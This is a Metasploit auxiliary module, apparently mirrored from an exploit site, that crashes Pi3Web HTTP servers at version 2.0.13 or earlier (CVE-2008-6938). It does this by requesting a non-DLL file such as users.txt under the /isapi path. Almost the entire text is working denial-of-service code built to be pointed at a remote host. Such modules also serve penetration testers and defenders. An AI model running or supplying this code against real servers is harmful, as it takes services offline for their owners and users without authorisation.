## https://sploitus.com/exploit?id=PACKETSTORM:180582
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'Pi3Web ISAPI DoS',
'Description' => %q{
The Pi3Web HTTP server crashes when a request is made for an invalid DLL
file in /isapi for versions 2.0.13 and earlier. By default, the non-DLLs
in this directory after installation are users.txt, install.daf and
readme.daf.
},
'Author' => 'kris katterjohn',
'License' => MSF_LICENSE,
'References' => [
[ 'CVE', '2008-6938'],
[ 'OSVDB', '49998'],
[ 'EDB', '7109' ]
],
'DisclosureDate' => '2008-11-13'))
register_options([
OptString.new('FILENAME', [ true, 'File in /isapi to request', 'users.txt' ])
])
end
def run
begin
o = { 'uri' => "/isapi/#{datastore['FILENAME']}" }
c = connect(o)
c.send_request(c.request_raw(o))
print_status("Request sent to #{rhost}:#{rport}")
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_status("Couldn't connect to #{rhost}:#{rport}")
rescue ::Timeout::Error, ::Errno::EPIPE
end
end
end